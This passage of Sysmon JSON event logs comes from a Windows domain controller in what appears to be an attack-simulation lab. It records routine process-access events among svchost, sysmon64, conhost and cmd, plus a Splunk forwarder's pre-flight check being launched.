C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3361,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3362,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3363,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3364,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3365,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3366,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3367,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-0010B46A0100}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-0010B46A0100}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3368,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.697\r\nProcessGuid: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nProcessId: 2364\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-0010AA6A0500}\r\nParentProcessId: 2256\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2>&1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.697","ProcessGuid":"{41C8662E-1FF4-5F25-0000-0010596B0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 